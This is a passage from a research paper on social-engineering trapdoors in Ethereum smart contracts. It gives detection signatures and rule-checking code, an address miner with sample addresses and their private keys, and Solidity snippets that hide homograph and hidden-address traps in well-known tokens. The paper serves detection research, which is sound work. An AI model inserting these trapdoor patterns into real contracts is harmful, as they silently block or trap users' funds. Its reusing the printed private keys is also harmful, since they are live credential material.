S6      emit instruction inside a call stack of a payable function                                    A2
S7      Constant variable with address type and a hard-coded value                                    A2
S8      Non-constant variable with address type and a hard-coded value                                A2
S9      Ether transfer to an address variable initialized with a hard-coded value                     A2
S10     Hard-coded bytes32 value                                                                      A3
S11     Ether transfer inside a branching arm                                                         A3, A4, A5, A6
S12     Token transfer inside a branching arm                                                         A3, A4, A5, A6
S13     Ether transfer with a require statement in the call stack of the same transaction             A3, A4, A5, A6
S14     Token transfer with a require statement in the call stack of the same transaction             A3, A4, A5, A6
S15     bytes32 value inside a branching condition                                                    A3
S16     Comparison of Keccak256 hash values                                                           A4
S17     String literal as part of a branching condition                                               A4
S18     String literal as part of a require statement                                                 A4
S19     Ether transfer with call or delegatecall statement in the call stack of the same transaction  A5, A6
S20     Token transfer with call or delegatecall statement in the call stack of the same transaction  A5, A6
S21     String literal with a non-ASCII symbol somewhere in the contract                              A5, A6
S22     ICC status is used in a require statement                                                     A6
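The CNF rules can be evaluated mechanically once the set of matched signatures for a contract is known. The following is a minimal Python sketch of that evaluation, not the detection tool itself: the dictionary `CNF_RULES` and the function `matching_attacks` are hypothetical names introduced here, and the input is assumed to be the set of signature indices (1 to 22) that some earlier analysis step has already matched.

```python
from typing import Dict, FrozenSet, Iterable, List

# Each rule is a conjunction (list) of clauses; each clause is a disjunction
# (set) of signature indices, transcribed from the six CNF rules above.
CNF_RULES: Dict[str, List[FrozenSet[int]]] = {
    "A1": [frozenset({1}), frozenset({2, 3, 4}), frozenset({5})],
    "A2": [frozenset({2, 3, 4}), frozenset({5}), frozenset({6}),
           frozenset({7, 8}), frozenset({9})],
    "A3": [frozenset({5}), frozenset({10}), frozenset({11, 12, 13, 14}),
           frozenset({15})],
    "A4": [frozenset({5}), frozenset({11, 12, 13, 14}), frozenset({16}),
           frozenset({17, 18})],
    "A5": [frozenset({5}), frozenset({11, 12, 13, 14}), frozenset({19, 20}),
           frozenset({21})],
    "A6": [frozenset({5}), frozenset({11, 12, 13, 14}), frozenset({19, 20}),
           frozenset({21}), frozenset({22})],
}


def matching_attacks(matched_signatures: Iterable[int]) -> List[str]:
    """Return the attacks whose CNF rule is satisfied by the matched signatures."""
    matched = set(matched_signatures)
    return [
        attack
        for attack, clauses in CNF_RULES.items()
        # A rule holds when every clause has at least one matched signature.
        if all(clause & matched for clause in clauses)
    ]


if __name__ == "__main__":
    print(matching_attacks({5, 11, 16, 17}))
    print(matching_attacks({5, 12, 19, 21, 22}))
```

Because the rule for A6 extends the rule for A5 with the single clause S22, any contract flagged for A6 under this sketch is also flagged for A5.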

                       Table 8.2: Sample lowercase EIP-55-compliant addresses.
EIP-55-compliant Lowercase Address          Private Key of the Account                                        Mining Time (ms)
0x47aa51fd5a98e155623202944c44f414a7205a46  bed6ad86fa57efe205abdcda885b30107b1a75d6196b271d4785cd3ed66c8d5d  6,822
0x8310561552fa9569337d53493c6a5a8991894072  4856d3e9c032724eca42a5fd48e99dc5b77cb5be96ca68eb9e03511257999e61  3,137
0x2797a2c394686d33da258c7de6206617c398605e  1321d554cddf1b756e8d15cba0a33fb4e84b95119acf8e267f7505f29f652020  460
0x596443674c431e7da447803ef94a7e52cfd71169  1265ca0334308e3dfb2ddd9a7eb466aa488a863671e6ad6290d93383489159d1  1,954
0x52206f3a3b80212898760a6ae124474183b30612  a532795660fbb9ccb5f3862e102f19680a5def583aea24a2875de7f1dd6c8298  266
0xc71c3eec3aa44e7746725fc771b8b821419e4360  3b1b3a32d73bd32f837440cd0469a8010fa6f3e02358ffeb76c95454ee2a0e36  4,896
    if (keccak256(abi.encode(symbol)) == keccak256(abi.encode("USDT"))) {
        return super.transfer(_to, _value);
    }
Figure 8.1: Integration of the A4 attack pattern into the transfer ERC-20 method of Tether stablecoin
source code.
B: Address Miner
We developed an address miner that searches for Ethereum addresses whose EIP-55 checksum
encoding is entirely lowercase. Table 8.2 shows six sample addresses. Such addresses can be used
in the A3 attack.
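The acceptance test that such a miner applies to each candidate address can be sketched as follows. This is a minimal Python illustration under stated assumptions, not the miner used in this work: the function names `keccak256`, `to_eip55`, and `has_all_lowercase_checksum` are hypothetical, Keccak-256 is implemented inline because the Python standard library only ships the differently padded SHA-3 variant, and key generation on secp256k1 (which a complete miner also needs) is omitted.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def _rol64(a: int, n: int) -> int:
    n %= 64
    return ((a << n) | (a >> (64 - n))) & MASK64


def _keccak_f1600(lanes):
    """Keccak-f[1600] permutation on a 5x5 matrix of 64-bit lanes."""
    r = 1
    for _ in range(24):
        # theta
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # rho and pi
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # chi
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ (~row[(x + 1) % 5] & row[(x + 2) % 5])
        # iota (round constants generated with the standard LFSR)
        for j in range(7):
            r = ((r << 1) ^ ((r >> 7) * 0x71)) % 256
            if r & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    return lanes


def _permute(state: bytearray) -> bytearray:
    lanes = [[int.from_bytes(state[8 * (x + 5 * y):8 * (x + 5 * y) + 8], "little")
              for y in range(5)] for x in range(5)]
    lanes = _keccak_f1600(lanes)
    out = bytearray(200)
    for x in range(5):
        for y in range(5):
            out[8 * (x + 5 * y):8 * (x + 5 * y) + 8] = lanes[x][y].to_bytes(8, "little")
    return out


def keccak256(data: bytes) -> bytes:
    """Original Keccak-256 (padding byte 0x01), as used by Ethereum."""
    rate = 136
    padded = bytearray(data)
    pad_len = rate - (len(padded) % rate)
    padded += b"\x01" + b"\x00" * (pad_len - 1)
    padded[-1] |= 0x80
    state = bytearray(200)
    for offset in range(0, len(padded), rate):
        for i in range(rate):
            state[i] ^= padded[offset + i]
        state = _permute(state)
    return bytes(state[:32])


def to_eip55(address: str) -> str:
    """Apply the EIP-55 mixed-case checksum to a hex address."""
    body = address[2:] if address[:2].lower() == "0x" else address
    body = body.lower()
    digest = keccak256(body.encode("ascii")).hex()
    # A hex letter is uppercased when the matching hash nibble is >= 8.
    return "0x" + "".join(
        ch.upper() if int(digest[i], 16) >= 8 else ch for i, ch in enumerate(body)
    )


def has_all_lowercase_checksum(address: str) -> bool:
    """True when the EIP-55 encoding of the address contains no uppercase letter."""
    checksummed = to_eip55(address)
    return checksummed == checksummed.lower()
```

A miner built on this check would repeatedly generate a key pair, derive the address, and keep the pair only when `has_all_lowercase_checksum` returns true; the same function can be applied to the addresses in Table 8.2.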
C: Integrating Social Engineering Attack Patterns in Existing Tokens
A4 Attack Pattern Integration in USDT: In Fig. 8.1, we show that the A4 social engineering
attack pattern can be integrated into the Tether stablecoin source code without changing the logic
of the smart contract. Specifically, in the Tether USD token, we add a seemingly harmless check
of the token symbol within the ERC-20 transfer method. The evasive test deployment uses
all-Latin characters for the token symbol, whereas the malicious smart contract is deployed by
passing to the constructor a token symbol with an unnoticeable substitution of one character,
which causes the fund transfer to fail.
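The reason the symbol check fails after the substitution is that the two symbols render alike but are encoded as different bytes, so any hash over them differs. The short Python sketch below illustrates this at the byte level only. The choice of the Cyrillic capital letter Te (U+0422) as the substituted character is an assumption made for illustration, and `utf8_hex` is a hypothetical helper.

```python
def utf8_hex(text: str) -> str:
    """Hex dump of the UTF-8 bytes that a hash function would consume."""
    return text.encode("utf-8").hex()


LATIN_SYMBOL = "USDT"
# Hypothetical spoofed symbol: the final letter is Cyrillic Te (U+0422),
# which many fonts render identically to the Latin "T".
SPOOFED_SYMBOL = "USD\u0422"

if __name__ == "__main__":
    print(utf8_hex(LATIN_SYMBOL))
    print(utf8_hex(SPOOFED_SYMBOL))
    print(LATIN_SYMBOL == SPOOFED_SYMBOL)
```

Since the byte strings differ, the comparison of the two Keccak256 hashes in Fig. 8.1 evaluates to false for the spoofed symbol, and the transfer branch is never taken.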
A5 Attack Pattern Integration in BNB: Fig. 8.2 shows an integration of the A5 attack pattern
into the Binance exchange token source code. Fig. 8.3 shows the helper contract for the A5 attack
in the Binance Token. In the transfer method (Fig. 8.2), we insert a logging routine, which saves
the transfer record in a consolidated database in another smart contract (Fig. 8.3). In a test
deployment, the code performs logging as expected. However, in the final deployment, the owner
replaces one letter in the logging function header with a homograph twin, e.g., the second letter
“o” with the identical-looking Cyrillic letter. The log call (Fig. 8.2, line 3) throws an exception
and the transfer fails.
 1 address consolidatedDBAddress =
 2     0x51Db8896d6bD64385C5785Df0685cc4C24F01F0f;
 3 bytes memory payload = abi.encodeWithSignature("logVolume(address,uint256)", _to, _value);
 4 bool success = address(consolidatedDBAddress).call(payload);
 5 if (success) {
 6     balanceOf[msg.sender] = SafeMath.safeSub(balanceOf[msg.sender], _value);
 7     balanceOf[_to] = SafeMath.safeAdd(balanceOf[_to], _value);
 8     Transfer(msg.sender, _to, _value);
 9 }
Figure 8.2: Integration of the A5 attack pattern into the transfer method of the Binance exchange
token source code.
    function logVolume(address client, uint256 amount) public {
        require(msg.sender == authorizedCallerSmartContract);
        clientVolumes[client] += amount;
    }
Figure 8.3: Function logVolume in the helper contract used for the A5 attack in the Binance
exchange token.
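A homograph in a call signature is invisible to a human reviewer but easy to flag mechanically, which is the idea behind signature S21. The following Python sketch scans source text for double-quoted string literals and reports every non-ASCII character in them. It is an illustration under simplifying assumptions rather than the detector used in this work: the regular expression `STRING_LITERAL` and the function `non_ascii_in_literals` are hypothetical, and single-quoted literals, comments, and unicode escape sequences are not handled.

```python
import re
import unicodedata
from typing import List, Tuple

# Double-quoted string literal, allowing backslash escapes inside.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')


def non_ascii_in_literals(source: str) -> List[Tuple[str, str, str]]:
    """Return (literal, code point, Unicode name) for each non-ASCII character."""
    findings = []
    for match in STRING_LITERAL.finditer(source):
        literal = match.group(1)
        for ch in literal:
            if ord(ch) > 127:
                findings.append(
                    (literal, "U+%04X" % ord(ch), unicodedata.name(ch, "UNKNOWN"))
                )
    return findings


if __name__ == "__main__":
    # Hypothetical tampered line: the first "o" is Cyrillic (U+043E).
    tampered = 'abi.encodeWithSignature("l\u043egVolume(address,uint256)", _to, _value);'
    for literal, code_point, name in non_ascii_in_literals(tampered):
        print(code_point, name)
```

Reporting the Unicode name alongside the code point makes the substitution explicit even when the rendered glyph is indistinguishable from its Latin counterpart.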
A1 Attack Pattern Integration in LINK: In this token, the malicious smart contract owner mines
a similar public address with the same EIP-55 checksum as in the original address, and initializes
vipClient via the constructor (Fig. 8.4, line 5). As a result, the VIP user, who does not recognize
the address falsification, will fail to transfer funds.
 1 function LinkToken(address vc) public
 2 {
 3     balances[msg.sender] = totalSupply;
 4     transferAllowedAfterBlock = block.number + (2 * 365 * 24 * 60 * 6);
 5     vipClient = vc;
 6     owner = msg.sender;
 7 }
 8 ...
 9 function transfer(address _to, uint _value) public
10 validRecipient(_to) returns (bool success) {
11     if (block.number > transferAllowedAfterBlock || msg.sender == vipClient || msg.sender == owner) {
12         return super.transfer(_to, _value);
13     }
14 }
Figure 8.4: Integration of the A1 attack pattern into the transfer method of the ChainLink oracle
token source code.
A6 Attack Pattern Integration in LEO: Fig. 8.5 shows an integration of the A6 attack pattern into
the token’s source code. Fig. 8.6 shows the helper contract for the A6 attack in the Bitfinex Token.
In this token, a helper smart contract is used by the attacker for purported protection against
transfer flood, i.e., performing too many small transfers by one user. The smart contract (see
Fig. 8.6) has two functions: logAndCheck and the seemingly unrelated and benign
onCurve34906537. However, the latter function is the one called by the token smart contract due
to homograph substitution of several symbols in the call argument. Unlike the A5 attack against
the BNB token, the A6 attack does not require changing the original ICC header before the
production deployment. Instead, the contract owner simply changes the value of the
extraFeaturesEnabled flag to activate the attack.
    address floodProtectionSC =
        0x5B38C7add838EfFF53412C71E9efF5c182c6b407;
    bytes memory payload = abi.encodeWithSignature("logAndCheck(address)", msg.sender);
    (bool succ, bytes memory result) = address(floodProtectionSC).call(payload);
    require(succ);
    if (abi.decode(result, (bool)) == true) {
        doTransfer(msg.sender, _to, _amount);
        return true;
    }
Figure 8.5: Integration of the A6 attack pattern into the transfer ERC-20 call of the Bitfinex LEO
source code.
    function onCurve34906537(address) public view returns (bool) {
        if (extraFeaturesEnabled) {
            return true;
        }
        return false;
    }
    function logAndCheck(address client) public returns (bool) {
        require(msg.sender == authorizedCallerSmartContract);
        calls[client] += 1;
        return true;
    }
Figure 8.6: Function onCurve34906537 is called instead of logAndCheck in the Helper contract,
which is used for the A6 attack in the Bitfinex LEO token.
Hybrid Attack Pattern Integration in CK: Fig. 8.7 shows an integration of the hybrid A1/A2
attack pattern into the CryptoKitties ERC-721 collectible source code. The CryptoKitties smart
contract can accept and withdraw Ether. In the function withdrawBalance (see Fig. 8.7), send is
preceded by a seemingly safe and reasonable fee collection. This arrangement works impeccably
during testing. However, after the production deployment, the owner of the contract deploys a
non-payable smart contract at the address stored in fee_collector. Such a substitution is possible
because the address has been pre-calculated as described in Section 2.4. Since transfer reverts
when the recipient cannot accept Ether, subsequent calls to withdrawBalance fail.
    address public fee_collector =
        0xce02be9dfc4c68bae86a0bdf1bab68de77bb0d8d;
    function withdrawBalance() external onlyCEO {
        uint256 balance = this.balance;
        uint256 subtractFees = (pregnantKitties + 1) * autoBirthFee;
        if (balance > subtractFees) {
            fee_collector.transfer(subtractFees);
            cfoAddress.send(balance - subtractFees);
        }
    }
Figure 8.7: A hybrid A1 + A2 attack pattern integrated into the withdrawBalance function of the
CryptoKitties ERC-721 collectible source code.